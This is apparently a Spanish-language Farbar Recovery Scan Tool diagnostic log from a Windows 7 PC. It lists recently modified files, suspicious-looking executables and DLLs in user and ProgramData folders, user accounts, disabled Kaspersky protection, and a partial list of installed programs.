2020-01-31 11:11 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2020-01-31 11:10 - 2019-10-18 11:00 - 002581504 _____ (Farbar) C:\Users\MrEidrian\Desktop\FRST64.exe
2020-01-31 11:10 - 2012-06-25 16:19 - 000000000 ____D C:\Users\MrEidrian\AppData\Local\Adobe
2020-01-31 11:07 - 2019-09-14 08:18 - 000068424 _____ (EnigmaSoft Limited) C:\Windows\system32\Drivers\EnigmaFileMonDriver.sys
2020-01-31 11:07 - 2017-03-09 11:56 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2020-01-31 11:06 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-01-17 12:07 - 2016-12-02 08:26 - 000000000 ____D C:\Users\MrEidrian\AppData\LocalLow\Mozilla
2020-01-17 12:03 - 2018-01-20 18:37 - 000000000 ____D C:\ProgramData\MEGAsync
2020-01-17 12:01 - 2012-06-07 12:49 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2020-01-17 12:00 - 2009-07-14 05:45 - 000026224 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2020-01-17 12:00 - 2009-07-14 05:45 - 000026224 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2020-01-17 11:54 - 2014-02-03 20:35 - 000000000 ____D C:\ProgramData\Google
2020-01-17 11:51 - 2012-09-21 16:34 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-01-17 11:51 - 2012-06-07 13:18 - 000000000 ____D C:\Program Files\CCleaner
2020-01-17 11:48 - 2016-12-01 09:13 - 000004320 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2020-01-17 11:48 - 2012-06-07 12:49 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2020-01-17 11:48 - 2012-06-07 12:49 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2020-01-17 11:48 - 2012-06-07 12:49 - 000000000 ____D C:\Windows\system32\Macromed
2020-01-17 11:47 - 2012-10-12 08:36 - 000000000 ____D C:\Users\MrEidrian\AppData\LocalLow\Temp
2020-01-17 11:47 - 2012-10-12 08:36 - 000000000 ____D C:\Users\MrEidrian\AppData\Local\CRE
2020-01-17 11:40 - 2015-06-10 18:11 - 000004056 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1380006602
2020-01-17 11:35 - 2013-03-30 10:53 - 000003536 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2020-01-17 11:35 - 2013-03-30 10:53 - 000003408 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2020-01-17 11:35 - 2013-03-30 10:53 - 000000000 ____D C:\Program Files (x86)\Google
2020-01-17 11:34 - 2012-06-07 12:26 - 000000000 ____D C:\Users\MrEidrian

==================== Archivos en la raíz de algunos directorios ========

2020-01-31 11:11 - 2020-01-31 11:11 - 000334288 _____ (Mozilla Foundation) C:\ProgramData\freebl3.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000144848 _____ (Mozilla Foundation) C:\ProgramData\softokn3.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
2019-09-01 09:14 - 2019-09-01 09:14 - 000265728 _____ () C:\Users\MrEidrian\3272741.exe
2019-09-01 09:14 - 2019-09-01 09:14 - 000265728 _____ () C:\Users\MrEidrian\4131620.exe
2019-09-01 09:54 - 2019-09-01 09:54 - 000265728 _____ () C:\Users\MrEidrian\4411038.exe
2019-09-01 09:54 - 2019-09-01 09:54 - 000265728 _____ () C:\Users\MrEidrian\5111029.exe
2020-01-17 11:34 - 2020-01-17 12:07 - 008021968 _____ (Password Kernel) C:\Users\MrEidrian\updata.exe
2013-10-07 07:13 - 2013-10-07 07:13 - 000000132 _____ () C:\Users\MrEidrian\AppData\Roaming\Prefs. de formato GIF de Adobe CS6
2013-10-08 09:02 - 2019-03-08 09:35 - 000000132 _____ () C:\Users\MrEidrian\AppData\Roaming\Prefs. de formato PNG de Adobe CS6
2012-09-23 17:25 - 2012-09-23 17:34 - 000000600 _____ () C:\Users\MrEidrian\AppData\Roaming\winscp.rnd
2012-11-04 21:33 - 2014-03-13 10:30 - 000001456 _____ () C:\Users\MrEidrian\AppData\Local\Adobe Guardar para Web 13.0 Prefs
2019-09-01 07:28 - 2019-09-01 07:28 - 008006656 _____ () C:\Users\MrEidrian\AppData\Local\agent.dat
2019-09-01 07:28 - 2019-09-01 07:28 - 000054272 _____ () C:\Users\MrEidrian\AppData\Local\ApplicationHosting.dat
2019-09-01 07:43 - 2019-09-01 07:43 - 000016896 _____ () C:\Users\MrEidrian\AppData\Local\clakem.dll
2019-09-01 07:28 - 2019-09-01 07:28 - 000070992 _____ () C:\Users\MrEidrian\AppData\Local\Config.xml
2013-03-30 11:06 - 2018-10-19 08:05 - 000012288 _____ () C:\Users\MrEidrian\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2017-02-18 12:05 - 2018-05-11 12:26 - 000534528 _____ (Dirección General de la Policía) C:\Users\MrEidrian\AppData\Local\DNIeService.exe
2019-09-01 07:28 - 2019-09-01 07:28 - 000140800 _____ () C:\Users\MrEidrian\AppData\Local\installer.dat
2019-09-01 07:28 - 2019-09-01 07:27 - 001489920 _____ (NA) C:\Users\MrEidrian\AppData\Local\K-bam.exe
2019-09-01 07:28 - 2019-09-01 07:28 - 002047539 _____ () C:\Users\MrEidrian\AppData\Local\K-bam.tst
2015-08-08 08:12 - 2019-04-02 11:15 - 000004096 ____H () C:\Users\MrEidrian\AppData\Local\keyfile3.drm
2019-09-01 07:28 - 2019-09-01 07:28 - 000126464 _____ () C:\Users\MrEidrian\AppData\Local\lobby.dat
2019-09-01 07:28 - 2019-09-01 07:28 - 000005568 _____ () C:\Users\MrEidrian\AppData\Local\md.xml
2019-09-01 07:28 - 2019-09-01 07:28 - 000126464 _____ () C:\Users\MrEidrian\AppData\Local\noah.dat
2017-10-13 16:33 - 2017-10-13 16:33 - 000000001 _____ () C:\Users\MrEidrian\AppData\Local\RawCopy.1.10.agreement
2017-10-13 16:34 - 2017-10-14 15:48 - 000000001 _____ () C:\Users\MrEidrian\AppData\Local\RawCopy.sourcedisk.index
2019-09-01 07:28 - 2019-09-14 08:29 - 000722944 _____ () C:\Users\MrEidrian\AppData\Local\sha.db
2019-09-01 07:28 - 2019-09-01 07:28 - 001895383 _____ () C:\Users\MrEidrian\AppData\Local\Statlux.bin
2019-09-01 07:28 - 2019-09-01 07:27 - 001489920 _____ (NA) C:\Users\MrEidrian\AppData\Local\Toplam.exe
2019-09-01 07:28 - 2019-09-01 07:28 - 000072787 _____ () C:\Users\MrEidrian\AppData\Local\Toplam.tst
2019-09-01 07:28 - 2019-09-01 07:28 - 000032038 _____ () C:\Users\MrEidrian\AppData\Local\uninstall_temp.ico

==================== SigCheck ============================

(No existe una corrección automática para los archivos que no pasan la verificación.)


LastRegBack: 2019-09-16 16:29
==================== Final de FRST.txt ========================
16 
Resultados del Análisis Adicional de Farbar Recovery Scan Tool (x64) Versión: 27-01-2020
Ejecutado por MrEidrian (31-01-2020 11:12:13)
Ejecutado desde C:\Users\MrEidrian\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2012-06-07 11:26:52)
Modo de Inicio: Normal
==========================================================


==================== Cuentas: =============================

Administrador (S-1-5-21-3862230028-3041123482-801023079-500 - Administrator - Disabled)
HomeGroupUser$ (S-1-5-21-3862230028-3041123482-801023079-1004 - Limited - Enabled)
Invitado (S-1-5-21-3862230028-3041123482-801023079-501 - Limited - Enabled)
MrEidrian (S-1-5-21-3862230028-3041123482-801023079-1000 - Administrator - Enabled) => C:\Users\MrEidrian
Noelia (S-1-5-21-3862230028-3041123482-801023079-1002 - Administrator - Enabled) => C:\Users\Noelia

==================== Centro de Seguridad ========================

(Si una entrada es incluida en el fixlist, será eliminada.)

AV: Kaspersky Internet Security (Disabled - Out of date) {C3113FBF-4BCB-4461-D78D-6EDFEC9593E5}
AS: Kaspersky Internet Security (Disabled - Up to date) {7870DE5B-6DF1-4BEF-ED3D-55AD9712D958}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Kaspersky Internet Security (Disabled) {FB2ABE9A-01A4-4539-FCD2-C7EA1246D49E}

==================== Programas instalados ======================

(Solo los programas de adware con indicador "Oculto", pueden ser añadidos al fixlist para hacerlos visibles. Los programas adware deben ser desinstalados manualmente.)

µTorrent (HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\uTorrent) (Version: 3.3.2.30180 - BitTorrent Inc.)
4K Video Downloader 4.5 (HKLM\...\{180B9AE1-F87B-4107-8C68-4265E927D6A8}) (Version: 4.5.0.2482 - Open Media LLC)
ACDSee Pro 5 (HKLM-x32\...\{35E0BA9D-3AFE-402A-99CA-D94FE1E73D18}) (Version: 5.0.110 - ACD Systems International Inc.)
Adobe After Effects CS6 (HKLM-x32\...\{4817D846-700B-474E-A31B-80892B3E92E3}) (Version: 11 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Dreamweaver CS6 (HKLM-x32\...\{A4ED5E53-7AA0-11E1-BF04-B2D4D4A5360E}) (Version: 12 - Adobe Systems Incorporated)
Adobe Flash Player 32 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 32.0.0.314 - Adobe)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.238 - Adobe)
Adobe Flash Player 32 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 32.0.0.238 - Adobe)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Premiere Pro CS6 (HKLM-x32\...\{7176B973-6011-43C1-AEBC-2D73FE7C6982}) (Version: 6.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.5.635 - Adobe Systems, Inc.)
Advanced Office Password Recovery (HKLM-x32\...\{930A9725-1D77-4F59-A53A-11D5540207A5}) (Version: 6.32.1622.4165 - Elcomsoft Co. Ltd.)
AIDA64 Extreme Edition v2.85 (HKLM-x32\...\AIDA64 Extreme Edition_is1) (Version: 2.85 - FinalWire Ltd.)
Alien Skin Blow Up 3 (HKLM\...\Alien Skin Blow Up 3) (Version:  - Alien Skin)
Alien Skin Exposure 5 (HKLM\...\Alien Skin Exposure 5) (Version:  - Alien Skin)
AMD Catalyst Install Manager (HKLM\...\{1E9871B6-7C44-9A3A-A1C0-F9729663C7F5}) (Version: 8.0.915.0 - Advanced Micro Devices, Inc.)
Anti-Twin (Installation 10/06/2019) (HKLM-x32\...\Anti-Twin 2019-06-10 17.30.31) (Version:  - Joerg Rosenthal, Germany)
Aplicación para detectar Winamp (HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
Apple Application Support (32 bits) (HKLM-x32\...\{C1BCFECF-6EC2-4750-9072-5E2489423F8F}) (Version: 7.5 - Apple Inc.)
Apple Application Support (64 bits) (HKLM\...\{B202C7F5-7DE3-4FBF-B259-E70E625F56FC}) (Version: 7.5 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{B5A46811-3612-4DA5-8A5A-E6DED5D7C523}) (Version: 12.2.1.12 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
aTube Catcher (HKLM-x32\...\aTube Catcher) (Version: 2.9.1462 - DsNET Corp)
aTube Catcher versión 3.8 (HKLM-x32\...\{D43B360E-722D-421B-BC77-20B9E0F8B6CD}_is1) (Version: 3.8 - DsNET Corp)
Avidemux 2.6 - 64bits (HKLM-x32\...\Avidemux 2.6 - 64bits (64-bit)) (Version: 2.6.5.8897 - )
Backup and Sync from Google (HKLM\...\{768C0072-2FD2-4934-9824-B2A1E81AEA5D}) (Version: 3.45.5545.5747 - Google, Inc.)
Bamboo (HKLM\...\Pen Tablet Driver) (Version: 5.2.5-5 - Wacom Technology Corp.)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Belkin USB Wireless Adaptor (HKLM-x32\...\{549CE1BD-88E4-4C5E-BF75-B155624714CC}) (Version: 1.0.0.10 - Belkin) Hidden
Belkin USB Wireless Adaptor (HKLM-x32\...\InstallShield_{549CE1BD-88E4-4C5E-BF75-B155624714CC}) (Version: 1.0.0.10 - Belkin)
bl (HKLM-x32\...\{2A075BB4-E976-4278-BF3F-E5C6945D84C0}) (Version: 1.0.0 - Your Company Name) Hidden
Boilsoft Video Joiner 5.22 (HKLM-x32\...\Boilsoft Video Joiner_is1) (Version:  - Boilsoft, Inc.)
Boilsoft Video Joiner 6.57 (HKLM-x32\...\{FD39EF4B-0B5C-4B33-8D57-2EE865A80EB1}_is1) (Version:  - Boilsoft, Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Box Sync (64 bit) (HKLM\...\{C1135974-554F-476D-B04F-0B79CFE49364}) (Version: 3.4.25.0 - Box, Inc)
calibre 64bit (HKLM\...\{3A089BB3-2CED-49B7-9B12-9AF5F623405E}) (Version: 0.9.9 - Kovid Goyal)
Camtasia Studio 7 (HKLM-x32\...\{53FA9A9F-3C19-4D43-AD6B-DEF365D469BA}) (Version: 7.0.0 - TechSmith Corporation)
Catalogador 2007 (HKLM-x32\...\Catalogador) (Version:  - )
CCleaner (HKLM\...\CCleaner) (Version: 5.61 - Piriform)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.4.2.3442 - CDBurnerXP)
CloudNet (HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATENCIÓN
CPUID CPU-Z 1.64.0 (HKLM\...\CPUID CPU-Z_is1) (Version:  - ) <==== ATENCIÓN
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.45.4.0314 - DT Soft Ltd)
Desinstalación de CopyTrans Control Center solamente (HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\CopyTrans Suite) (Version: 4.100 - WindSolutions)
Dfine 2.0 (HKLM-x32\...\Dfine 2.0 Stand-Alone) (Version: 2.1.0.7 - Nik Software, Inc.)
Diablo III (HKLM-x32\...\Diablo III) (Version:  - Blizzard Entertainment)
Driver Sweeper versión 3.2.0 (HKLM-x32\...\{5A67D2EA-FB70-4033-A6F3-606AD85B2015}_is1) (Version: 3.2.0 - Phyxion.net)
EaseUS Data Recovery Wizard 9.5 (HKLM\...\EaseUS Data Recovery Wizard 9.5_is1) (Version:  - EaseUS)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - )
EssentialPIM Pro (HKLM-x32\...\EssentialPIM Pro) (Version: 5.54 - Astonsoft Ltd)
Evernote v. 4.6.6 (HKLM-x32\...\{6146B9DC-C33D-11E2-BDE1-984BE15F174E}) (Version: 4.6.6.8360 - Evernote Corp.)
Exact Audio Copy 1.3 (HKLM-x32\...\Exact Audio Copy) (Version: 1.3 - Andre Wiethoff)
Excel Password Recovery Lastic 1.2 (HKLM-x32\...\Excel Password Recovery Lastic_is1) (Version:  - )
Excel Password Recovery Lastic 1.3 (Usuario actual) (HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Excel Password Recovery Lastic_is1) (Version:  - )
Express Rip, extractor de CD (HKLM-x32\...\ExpressRip) (Version: 1.98 - NCH Software)
FileZilla Client 3.6.0 (HKLM-x32\...\FileZilla Client) (Version: 3.6.0 - FileZilla Project)
Flickr Uploadr 3.2.1 (HKLM-x32\...\Flickr Uploadr) (Version:  - )
FotoPrix FotoLibro v4 (HKLM-x32\...\{2FEC2258-5F07-400B-82AE-232510ED187D}) (Version: 6.10.0049 - FotoPrix, S.A.)
Free AVI MPEG WMV MP4 FLV Video Joiner 5.0.2 (HKLM-x32\...\Free AVI MPEG WMV MP4 FLV Video Joiner_is1) (Version:  - FreeAudioVideoSoftTech, Inc.)
Free Video Flip and Rotate version 2.1.9.827 (HKLM-x32\...\Free Video Flip and Rotate_is1) (Version: 2.1.9.827 - DVDVideoSoft Ltd.)
Gadwin PrintScreen (HKLM-x32\...\Gadwin PrintScreen) (Version: 4.7 - Gadwin Systems, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 76.0.3809.132 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.421 - Google LLC) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.24.7 - Google Inc.) Hidden
GoPro Studio 2.0.0 (HKLM-x32\...\GoPro Studio) (Version: 2.0.0 - WoodmanLabs Inc. d.b.a. GoPro)
HandBrake 1.2.2 (HKLM-x32\...\HandBrake) (Version: 1.2.2 - )
HDD Regenerator (HKLM-x32\...\{2445981B-A23B-4A0E-AD15-3D391BDAEC3E}) (Version: 1.71.0012 - Abstradrome)
HDR Efex Pro (HKLM-x32\...\HDR Efex Pro) (Version: 1.2.0.0 - Nik Software, Inc.)
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
Helicon Focus 5.3.7 (HKLM-x32\...\Helicon Focus_is1) (Version:  - Helicon Soft Ltd.)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
Herramienta de descarga USB/DVD de Windows 7 (HKLM-x32\...\{266F443F-A296-406F-9EE8-DF4A1061C6CE}) (Version: 1.0.30 - Microsoft Corporation)
HiSuite (HKLM-x32\...\Hi Suite) (Version: 9.0.3.300 - Huawei Technologies Co.,Ltd)
Hofmann 12.0.0.11 (HKLM-x32\...\{FAF6DF16-51F8-4A8A-B3B2-D349A5FD491F}) (Version: 12.0.0 - Hofmann)
I Am Alive (HKLM-x32\...\{62952508-8C6F-4D31-9802-099FC67B41C3}) (Version: 1.00.0 - Ubisoft) Hidden
I Am Alive (HKLM-x32\...\InstallShield_{62952508-8C6F-4D31-9802-099FC67B41C3}) (Version: 1.00.0 - Ubisoft)
Imagenomic Noiseware 5.0 Plug-in (build 5007) (HKLM\...\ImagenomicNoisewarePlugin) (Version:  - )
Instalable DNIe (HKLM\...\{B4A6EF31-AC22-4BE2-A714-581FC66DBFAF}) (Version: 13.0.0 - Cuerpo Nacional de Policía)
iTunes (HKLM\...\{4699F245-9592-4D3A-A0A1-6D4152E9F49B}) (Version: 12.9.5.7 - Apple Inc.)
Java 8 Update 171 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180171F0}) (Version: 8.0.1710.11 - Oracle Corporation)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
JDownloader 0.9 (HKLM-x32\...\5513-1208-7298-9440) (Version: 0.9 - AppWork GmbH)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Junk Mail filter update (HKLM-x32\...\{FECB76C1-1C1D-4A84-8D47-5754C74B5A5E}) (Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Kaspersky Internet Security 2013 (HKLM-x32\...\{560985FB-4B76-4121-9189-7A2CDC7886D6}) (Version: 13.0.1.4190 - Kaspersky Lab) Hidden
Kaspersky Internet Security 2013 (HKLM-x32\...\InstallWIX_{560985FB-4B76-4121-9189-7A2CDC7886D6}) (Version: 13.0.1.4190 - Kaspersky Lab)
Kastor - Tube To Mp3 V 2.99 (HKLM-x32\...\{87C334CF-063A-4AEA-B523-1DE04014BA19}_is1) (Version: 2.99.95.0 - KastorSoft)
K-Lite Codec Pack 9.9.5 (Basic) (HKLM-x32\...\KLiteCodecPack_is1) (Version: 9.9.5 - )
Kutools for Excel 18.00 (HKLM-x32\...\{A095BA43-4A97-4D55-8E25-A0BC46F10765}_is1) (Version: 18.00 - Addin Technology Inc.)
League of Legends (HKLM-x32\...\{C3342033-211F-40DD-A03D-0E775B8DEA98}) (Version: 3.0.1 - Riot Games) Hidden
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games)
Los Sims™ 3 (HKLM-x32\...\{C05D8CDB-417D-4335-A38C-A0659EDFD6B8}) (Version: 1.0.615 - Electronic Arts)
M3 RAW Drive Recovery version 5.6.8 (HKLM-x32\...\{F354E53A-879C-4F1B-9D4A-DB8A6B986F46}}_is1) (Version: 5.6.8 - M3 Data Recovery)
Main service (HKLM-x32\...\{EF758C50-5FA2-4B0A-86D3-8B65B176BC53}) (Version:  - )
Malwarebytes versión 3.8.3.2965 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.8.3.2965 - Malwarebytes)
MEGAsync (HKLM-x32\...\MEGAsync) (Version:  - Mega Limited)
Microsoft .NET Framework 4.7.2 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.7.03062 - Microsoft Corporation)
Microsoft .NET Framework 4.7.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.03062 - Microsoft Corporation)
Microsoft Chart Controls for Microsoft .NET Framework 3.5 (KB2500170) (HKLM-x32\...\{41785C66-90F2-40CE-8CB5-1C94BFC97280}) (Version: 3.5.30730.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20513.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729 (HKLM\...\{4FFA2088-8317-3B14-93CD-4C699DB37843}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{3C3D696B-0DB7-3C6D-A356-3DB8CE541918}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft WSE 3.0 Runtime (HKLM-x32\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
MixPad, mezclador de archivos de audio (HKLM-x32\...\MixPad) (Version:  - NCH Software)
Mozilla Firefox 72.0.1 (x64 es-ES) (HKLM\...\Mozilla Firefox 72.0.1 (x64 es-ES)) (Version: 72.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 72.0.1.7311 - Mozilla)
Mp3tag v2.54 (HKLM-x32\...\Mp3tag) (Version: v2.54 - Florian Heidenreich)
Mumble 1.2.3 (HKLM-x32\...\{1B325F86-1AD4-45AC-B011-078CB02CC3A2}) (Version: 1.2.3 - Thorvald Natvig)
Nero 7 Premium (HKLM-x32\...\{CF097717-F174-4144-954A-FBC4BF301034}) (Version: 7.02.9753 - Nero AG)
Nik Collection (HKLM-x32\...\Nik Collection) (Version: 1.2.11 - Google)
Nitro Pro (HKLM\...\{9651FF7E-0DB1-4388-ADE7-017E4B9C9D47}) (Version: 11.0.3.134 - Nitro)
NMSDVDX64 v1.1 (HKLM\...\{49C4A807-A535-4E85-BD6D-5A7803473CA3}) (Version: 1.01.0001 - FOTOPRIX)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.6.3 - Notepad++ Team)
oberonapps version 1.00 (HKLM-x32\...\{411D68BC-2E50-4D32-9C80-BBCB09E943B5}_is1) (Version: 1.00 - oberonapps)
Opera Stable 65.0.3467.78 (HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Opera 65.0.3467.78) (Version: 65.0.3467.78 - Opera Software)
Pando Media Booster (HKLM-x32\...\{980A182F-E0A2-4A40-94C1-AE0C1235902E}) (Version: 2.6.0.7 - Pando Networks Inc.)
PDF Settings CS6 (HKLM-x32\...\{BFEAAE77-BD7F-4534-B286-9C5CB4697EB1}) (Version: 11.0 - Adobe Systems Incorporated) Hidden
PDF To JPG Converter 2.0.2 (HKLM-x32\...\PDF To JPG Converter_is1) (Version:  - PDF To JPG Converter)
pdfreader2019 version 20.01 (HKLM-x32\...\{624C8304-BA22-422C-97D6-A1233BC1167E}_is1) (Version: 20.01 - )
pdfreader2019 version 20.01 (HKLM-x32\...\{D7182362-EFCE-4527-9695-A099E7781B6D}_is1) (Version: 20.01 - )
Perfect Effects 8 (HKLM-x32\...\{C982ACFF-5997-4B7D-B3E1-CF7273A06FB2}) (Version: 8.1.0 - onOne Software)
Perfect Photo Suite 5.5.1 (HKLM-x32\...\{59679381-3F22-4A40-A7AD-890242D74DF4}) (Version: 5.5.1 - onOne Software)
ph (HKLM-x32\...\{185F9795-9663-4F13-9EF9-307A282ADB5A}) (Version: 1.0.0 - Your Company Name) Hidden
PTLens (HKLM-x32\...\{33F26F06-5989-49D0-8C83-691776349E0D}) (Version: 1.0.1040 - ePaperPress)
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
